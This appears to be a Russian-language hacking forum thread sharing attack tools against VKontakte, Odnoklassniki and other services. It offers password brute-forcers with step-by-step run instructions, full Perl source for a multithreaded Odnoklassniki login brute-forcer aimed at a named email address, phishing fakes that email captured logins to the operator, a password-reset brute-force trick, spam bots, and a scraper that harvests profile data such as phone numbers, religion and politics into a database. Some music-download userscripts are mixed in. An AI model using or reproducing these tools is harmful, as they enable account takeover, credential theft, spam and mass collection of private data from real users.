Уязвимости, фичи, получаем пароль

[Noctambulaar]

Как запустить скрипт:

Цитата:

--------------------------------------------------------------------------------
1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
2. потом копируем текст в текстовый файл из кода выше... меняем id и мыло жертвы на нужное ,сохраняем как brut.txt
3. переименовываем файл из brute.txt в brute.pl
4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
5. запускаем файл, и радуемся...
6. создастся good.txt, где и будет ваш пасс.

GUI-приложение, позволяющее брутить и чекать аккаунты Vkontakte.ru. Больше тебе не придется поднимать сервак только из-за того, что нужно поюзать чужой скрипт
Что,как,где
Checker:
Проверяет валидность акка и записывает валид в good.txt по дефолту.

Accounts file->Загружаем файл вида:
email@hostassword

Bruter:
Пытается подобрать пароль для заранее обозначенных email-ов.
Брутит пары mailass
Из валидных аккаунтов извлекает рейтинг пользователя
Выходной файл будет в формате:
user@hostass:rating

Misc
Поддержку прокси пока я выключил (альфа ведь)))
Hint
Чтобы пробрутить диапазон мыльников по одному паролю - поместите в файл паролей ваш пароль, и все емейлы будут брутиться по нему.
To-Do-List
В планах добавить спамилку групп с парсингом друзей владельца акка и рассылки им приглашений (тк многие сейчас стали запрещать посторонним приглашать их в группы).

Программа сырая, на стадии alpha, отписывайтесь здесь, какие глюки нашли, а так же ваши пожелания по поводу развития программ
Нажмите, чтобы раскрыть...

В данный момент очень популярны, стали соц. сети. Тут и рассмотрим фичи.

В файлах:
C!klodoL brut

RATE checker
VkBrute v. 1.03



Odnokl brut Kaimi


Словари для брута:
Русский словарь 194 775 строк
Англ. словарь, 3 ляма
Просто тупо набор англ. букв 194 775 строк
Beale wordlist - 7776 слов
Большой словарь (около 500000 слов)
Cловарь последовательных клавиатурных символов
Числовой словарь
Очень много словарей на разных языках, но размеры их не большие


Фейк контакта:тут
Взлом вконтакте, статья тут
Мелкие пакости вконтакте тут


PS: В этой теме нет помощи, помоги себе сам! Вопросы задавать в других темах.
Вложения
RATE_checker.txt
VkBrute_v.1.03.txt

 

[Winux]

Фейк без видео и в виде аттача
В архиве выше лежит еще видео,брут и еще какаято херня
Вложения
vkontakte_fake.rar

 

[Noctambulaar]

[Vkontakte] Qspamer by Chaak
Возможности:
Возможность отправлять коментарии к более чем 1938112 вопросам
Возможность установить задержку
Поддержка прокси
Поддержка логирования
Вывод в реальном времени
:zns2: смотреть

[Vkontakte] VKontakte Wall Messenger
Этот PHP скрипт написан с использованием сокетов и технологии Ajax. Основные фичи:
[ - ]Рассылать сообщения на стены ВКонтакте по диапазону id
[ - ]Рассылать сообщения на стены друзей каждого заданного аккаунта
[ - ]Флуд на стену конкретного человека
[ - ]Рассылка на собственные стены каждого заданного аккаунта
[ - ]Позволяет указать задержку отправки
[ - ]Позволяет рандомизировать сообщение
[ - ]Позволяет задать список прокси-серверов
[ - ]Добавление предложения каждому заданному аккаунту
[ - ]Добавление вопроса каждому заданному аккаунту
[ - ]Добавление заметки каждому заданному аккаунту
[ - ]Улучшены логи, статистика, исправлены мелкие недочеты
[ - ]Добавлен чекер аккаунтов
:zns2: смотреть

[odnoklassniki] сплоит
RST сплоит. Суть-баг в системе восстановления пароля. Шестизначный код выставляется в ссылке-подтверждени и легко брутится (кол-во попыток не лимитировано).
Нужно знать только мыло.
:zns2: смотреть

[LiveInternet.Ru] Спамер + Чекер
Описание: Спамер дневников пользователей данного сервиса.

Спам-сообщение скрипт оставляет в комментариях к последней записи в дневнике.
:zns2: смотреть

[Vkontakte] akk Checker by Chaak
Скрипт проверяет аккаунты на валидность, показывает в реальном времени в браузере:
id
количество друзей
рейтинг
количество неиспользованных голосов
:zns2: смотреть

[Vkontakte] VKTools (alpha)
GUI-приложение, позволяющее брутить и чекать аккаунты Vkontakte.ru. Больше тебе не придется поднимать сервак только из-за того, что нужно поюзать чужой скрипт
Что,как,где
Checker:
Проверяет валидность акка и записывает валид в good.txt по дефолту.
:zns2: смотреть

[Vkontakte] Инвиз вконтакте
статья.
:zns2: смотреть

[Vkontakte] bruteforce C#

Программа для перебора паролей от аккаунтов Вконтакте.ру, на C#
-Полный перебор, указывается алфавит и длина пароля.
-Перебор по словарю (планируется)
-Планируюется сделать перебор с эвристикой (т.е. это немного модифицированный полный перебор, учитывается что в словах не может быть подряд 2 гласной и 3 согласных букв)

скачать
исполн. файл
сорц

 

[Noctambulaar]

- VKontakte.ru
- Yahoo.com
- YouTube.com
- odnoklassniki.ru
- hotmail.ru
- mail.ru
- pochta.ru
- rambler.ru
- yandex.ru
- Gmail.com
- ICQ.com
- AOL.com - AIM
- d2jsp
- DailyMotion.com
- eBay.com
- EverQuest Forum
- FaceBook.com
- FileFront.com
- Gmail.de
- Habbo.de
- Habbohotel.com
- Itunes
- Megaupload.com
- MMOCheats
- Myspace
- Nexon.net
- OGame.de
- Oxedion
- Packstation
- PayPal.com
- PhotoBucket.com
- Plesk
- RapidShare.com
- RapidShare.de
- Ripway.com
- siteworld.de
- Skype.com
- Steam Phishing Site
- Strato
- VanGuard
- Usenext
- tutbu
Нажмите, чтобы раскрыть...

[Vkontakte] Фейк вконтакте агента

Присылает введенные данные на ваш E-Mail( Настраиваеться в билдере )

скачать

[odnoklassniki] фейк агента

скачать

[Vkontakte][odnoklassniki] веб фейки:




рапида
депозит

[odnoklassniki] Многопоточный брутер odnoklassnikiru
Код:
Скопировать в буфер обмена
#!/usr/bin/perl

use strict;
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Std;
use threads;
##############START#################
print "\n AAAAAA OOOOOO H H\n";
print " A A O O H H\n";
print " AAAAAA O O HHHHH\n";
print " A A O O H H\n";
print " A A OOOOOO H H\n\n";

open (FP , '<pass.txt') || die ("No password list! \n"); # Пароли в pass.txt
my @Pass = <FP>;
close FP;

my $email = 'yusdinara@yandex.ru'; # МЫЛО!
my $i=0;
my @thr;
my $ua = LWP::UserAgent->new;
my $cookies = HTTP::Cookies->new(agent => 'Opera/9.50 (X11; Linux x86_64; U; ru)');
$ua->cookie_jar($cookies); #Куки
for (@Pass)
{
my $nowpass = $_;
chomp @Pass;
if($thr[$i]) {threads->object($thr[$i]->tid())->join;}
$thr[$i]=threads->create(\&brute,$email,$nowpass);

$i=($i+1) % 5; #Количество потоков (5)

}

foreach(threads->list) { $_->join; }

sub brute()
{

$ua->cookie_jar($cookies);
my $req = $ua->post('http://w17.odnoklassniki.ru/cdk/st.cmd/login/tkn/5622', {
'st.posted'=>'set',
'st.email'=>$_[0],
'st.password'=>$_[1],
'button_go'=>'%D0%92%D0%BE%D0%B9%D1%82%D0%B8'
})->as_string;

my $result = $req =~/302 Found/;
if ($result)
{
print "[+]OK $_[0]:$_[0]\n";
open (G , '>>good.txt');
print G $_[0].":".$_[1]."\n";
close G;
die ('PASSWORD FOUND!!!!!\n\n\n');
}
else
{
print "[-] BAD $_[0]\n";

}}

#c0ded by Xszz.AoH;
#c0pyright AoH.Team http://aoh.name;

 

[Noctambulaar]

Скрипт собирает данные из открытых анкет. Необходимо задать несколько десятков аккаунтов вконтакте (сотни валидных хватит точно). Скрипт автоматически выберет все валидные и начнёт сбор, выводя иногда информацию в браузер. По пути будут отбрасываться аккаунты, имеющие рейтинг менее 30% (если таковые окажутся среди заданных). Все данные будут сохраняться в таблицу в БД MySQL. Если запись с заданным id уже существует, она будет просто обновлена. Если скрипт обнаружит сообщение вконтакте "Слишком быстрый просмотр страниц", то автоматически будет применена задержка.
С помощью viewer.php можно сделать выборку из базы по всем доступным полям.
Несмотря на то, что php не поддерживает многопоточность, можно открыть несколько экземпляров скрипта и собирать анкеты с разных диапазонов id.

ID
Имя
Фамилия
Пол
Дата рождения
Город рождения
Религиозные взгляды
Политические взгляды
Семейное положение
Мобильный телефон
Домашний телефон
ICQ
web-сайт
деятельность
ВУЗы
школы
лицеи
гимназии
текущий ВУЗ
интересы
любимая музыка
любимые фильмы
любимые TV-шоу
любимые книги
любимые игры
любимые цитаты
"обо мне"
Из всего этого можно выбрать, что нужно конкретно.
Нажмите, чтобы раскрыть...

setup.php - инсталлятор, его необходимо запустить в первую очередь
index.php - сам граббер
viewer.php - позволяет сделать выборку ID из базы по различным критериям
viewid.php - вызывается из viewer.php - просмотр данных о человеке с заданным ID

PHP с поддержкой fsockopen и set_time_limit(0); ignore_user_abort - опционально
MySQL 4.1 и выше
Несколько десятков аккаунтов вконтакте с рейтингом больше 30%

[Vkontakte] brutforce by Chaak

Возможности:

* Брут на один email по списку паролей
* Брут на один пароль по списку email
* Брут по списку emailassword

Преимущества:

* Графический интерфейс
* Большое количество настроек
* Простота
* Скорость при одном потоке - 15 паролей в секунду
* Работа на сервере

Требования:

* PHP-хостинг с поддержкой сокетов

Установка и настройка:

1. Залить скрипт на сервер
2. Выставить права(chmod) на файл good.txt - 777
3. В файл dictionary.txt положить лист паролей или email'ov или список emailassword
4. Запустить скрипт index.php и настроить его по своим нуждам.
5. Запустить и пойти пить пиво
6. Придти посмотреть пароли
7. Недостаок только в том чтотут один поток =(

скачать

[Vkontakte] brutforce


скачать

VKontakte Grabber 1.0 by DX
Описание скрипта:

Скрипт умеет собирать следующие данные:

Комплекс состоит из следующих файлов:

Требования для работы скрипта:


скачать

 

[Noctambulaar]

[Vkontakte] Авторегер вКонтакте.ру

[*]Регистрация
[*]Parser мейл
[*]активация

Скачать

thx Сталину

[Vkontakte] akkChecker by Chaak


Скрипт проверяет аккаунты на валидность, показывает в реальном времени в браузере:
-id
-количество друзей
-рейтинг
-количество неиспользованных голосов
Функции:
-Вывод результатов
-Сохранение в виде emailass:id
-Сохранение/не сохранение акков с рейтингом <30%
-Поддержка прокси
Отмечает все хорошее белым цветом(кол-во друзей > 200, рейтинг>100, кол-во неисп. голосов >0)

Сохраняет в файл(accounts.txt) акки в виде:
emailass или emailass:id

Update & bugfix:
-Добавлена поддержка прокси
-Добавлен Duplicate killer
-Добавлено отсеивание акков с низким рейтингом
-Добавлена сортировка акков по email'у
-Добавлена функция подсчета всех друзей
-Добавлена поддержка Transparent proxy
-Исправлен баг с языками(изза которого не отображались некоторые показатели)
-Исправлена функция GoldRate, которая не правильно работала.
-Ускорен вывод данных

Скачать

[Vkontakte] PrivateMessage Spamer

Скрипт спамит личными сообщениями, друзьям вконтакте.

Скачать
thx bZik

 

[Noctambulaar]

[Vkontakte] [Загрузка Музыки \ Видео на компьютер]
1) Рассмотрим вариант с музыкой, ее можно загрузить с помощью программ и скриптов!
Скрипты:

Описание:

Скрипт для GreaseMonkey или браузера Opera
Добавляет около кнопок прослушивания музыки ссылку для скачивания и ссылку для быстрого поиска слов песни.
Для работы нужен Firefox с установленным дополнением GreaseMonkey или Opera.
Если вы используете Opera, то полученный файл надо будет сохранить в тот каталог,
который выбран в “Tools > Preferences > Advanced > Content > JavaScript option > User JavaScript files”

Код:
Скопировать в буфер обмена
// ==UserScript==
// @name vkontakte music download
// @namespace http://vkontakte.net.ru
// @description Music download for vkontakte.ru
// @include http://vkontakte.ru/*
// ==/UserScript==


function addDownload(img) {
var str="";
if (img.wrappedJSObject) {
str=img.wrappedJSObject.onclick.toString();
} else {
str=img.onclick.toString(); //opera workaround
}
var re=/operate((d+)[^0-9]+(d+)[^0-9]+(d+),[^0-9a-zA-Z]+([0-9a-zA-Z]+)/;
var arr=re.exec(str);
//operate(209145,1044,362847,'db5a6cba31',194);
//http://cs1044.vkontakte.ru/u362847/audio/db5a6cba31.mp3
var td=img.parentNode;
var addon=document.createElement("a");
var user=arr[3];
if (user<100000) {
user=parseInt(user)+100000;
user=(user.toString()).substr(1);
}
addon.setAttribute("href","http://cs"+arr[2]+".vkontakte.ru/u"+user+"/audio/"+arr[4]+".mp3");
addon.innerHTML="download";
td.appendChild(addon);
}

function addDownloads() {
var imgs=document.getElementsByTagName("img");

for (var i=0;i<imgs.length;i++) {
if (imgs.className=="playimg") {
addDownload(imgs);
}
}
}

function addLyric(span) {
var title=span.innerHTML;
if (span.getElementsByTagName("a").length>0) {
title=span.getElementsByTagName("a")[0].innerHTML;
}
var parent=span.parentNode;
var artb=parent.getElementsByTagName("b")[0];
var artist=artb.innerHTML;
if (artb.getElementsByTagName("a").length>0) {
artist=artb.getElementsByTagName("a")[0].innerHTML;
}
var newdiv=document.createElement("div");
var addon=document.createElement("a");
// addon.setAttribute("href","http://lyrc.com.ar/en/tema1en.php?artist="+artist+"&songname="+title);
addon.setAttribute("href","http://www.lyricsplugin.com/wmplayer03/plugin/?artist="+encodeURIComponent(artist)+"&title="+encodeURIComponent(title));
addon.setAttribute("target","_blank");
addon.innerHTML="lyrics";
newdiv.appendChild(addon);
newdiv.className="duration";
parent.parentNode.appendChild(newdiv);
}

function addLyrics() {
var spans= document.getElementsByTagName("span");
re=/titled+/;
for (var i=0;i<spans.length;i++) {
if (re.test(spans.id)) {
addLyric(spans);
}
}
}

addLyrics();
addDownloads();


Сохранить в vkontakte.music.js

Грабер музыки с вконтакта:
Код:
Скопировать в буфер обмена
<html>
<body>
<center>
<form action="graber.php" name="main" method="post">
<input type="text" name="link" size="80">
<input type="submit" value="Грабить!">
<form>


<?php
set_time_limit(0); //убираем ограничение времени выполнения скрипта
if(@$_POST['link']!=""){

$link = $_POST['link']; //Указываем ссылку

$toparse="";

preg_match("/^(http:\/\/)?([^\/]+)/i",$link,$host); //Отделяем доменное имя

$req = "GET ".$link." HTTP/1.1\r\n"; //Формирование заголовка запроса
$req .="Host: ".$host[2]."\r\n"; //
$req .="Cookie: audio_vol=80;remixchk=5;remixemail=;remixmid=;remixpass=;#10\r\n"; //Передача кукис
$req .="Connection: Close\r\n\r\n"; //


$socket = fsockopen($host[2],80); //Открываем сокет на 80й порт серва

fwrite($socket,$req); //Отправляем запрос

while(!feof($socket)){ //
$toparse.=fgets($socket,128); //Получаем тело страницы по 128 байт
} //

fclose($socket); //Затрываем сокет

$mask_link =array('return operate(',');'); //Маска

preg_match_all("/(".$mask_link[0].")(.*)(".$mask_link[1].")/i",$toparse,$parsed_links); //Выбираем ссылки



foreach($parsed_links[3] as $link_str){ //Берем каждый елемент масива в переменную $link_str

$pattern=array("(",")","'"); //Что заменяем
$replace=array("","",""); //Чем заменяем

$replaced=str_replace($pattern,$replace,$link_str); //Убираем скобки
$link_mas=explode(",",$replaced); //Преобразуем строку где разделитель запятая в масив

echo "<a href=\"http://cs".$link_mas[1].".vkontakte.ru/u".$link_mas[2]."/audio/".$link_mas[3].".mp3\">"; //Начало ссылки

$mask_name=array($link_mas[0],'<\/span>'); //Маска поиска Имени

preg_match_all("/(".$mask_name[0].")(.*)(".$mask_name[1].")/i",$toparse,$parsed_names); // Выбираем имена

$pattern=array("\">","</b>","<span id=\"title$link_mas[0]"); //Что заменяем
$replace=array("","",""); //Чем заменяем

$replaced=str_replace($pattern,$replace,$parsed_names[2][0]); //Убираем мусор


echo $replaced."</a>
"; //Конец ссылки
}
}
?>


</center>
</body>
</html>

Еще один скрипт:
Код:
Скопировать в буфер обмена
javascript:function operate(konfuze,loves,you,all_,xP){you=you.toStrin g(10);while(you.length<5){you='0'+you;}document.getElementById('audio'+ko nfuze).innerHTML='<div><a href="http://cs'+loves+'.vkontakte.'+'ru/u'+you+'/audio/'+all_+'.mp3">Cкачать '+document.getElementById('performer'+konfuze).inn erHTML+' - '+document.getElementById('title'+konfuze).innerHT ML+'</a></div>
';}

[Вступить во все группы данного пользователя]
1)Сам скрипт:
Код:
Скопировать в буфер обмена
<form id="param">
<table width="500" height="101" border="0">
<tr>
<td width="112">with</td>
<td width="378"><input name="minZn" type="text" value="1"></td>
</tr>
<tr>
<td>to</td>
<td><input name="maxZn" type="text" value="999999"></td>
</tr>
<tr>
<td>adress</td>
<td><input name="adress" type="text" value="http://vkontakte.ru/groups.php?act=enter&gid=" size="50"></td>
</tr>
<tr>
<td> </td>
<td><input name="button" type="button" onClick="GoHack()" value="Vkontakte must die!!(Go hack)">
<input name="button2" type="button" onClick="StopHack()" value="STOP"></td>
</tr>
</table>
</form>
<script language="javascript">
function StopHack()
{
hackwindow.close();
}

function HackWindowNewlocation(start, end, current)
{
var time=4000;
var domen=document.getElementById("param").adress.value;
var url="";
start2=start;
current2=current;
end2=end;
if(current2==start2){hackwindow=window.open("http://google.ru","hack");}
if ((current2-1)==end2) {return;}
current2++;
url=domen+current.toString();
window.hackwindow.location=url.toString();
setTimeout("HackWindowNewlocation(start2, end2, current2)",time);
}

function GoHack()
{
var start=document.getElementById("param").minZn.value;
var end=document.getElementById("param").maxZn.value;
var current=start;
HackWindowNewlocation(start,end,current);
}
</script>

 

[Noctambulaar]

[Vkontakte] VkChat_by_a1ien фейк flash


Переделанный скрипт от AdReNa1!Ne.
[ + ] Проверка логина при вводе нажатии кнопки вход
[ + ] После ввода верного логина подгружается сторонний чат(не открывается никаких левых окон)

скачать

write sec | null, bZik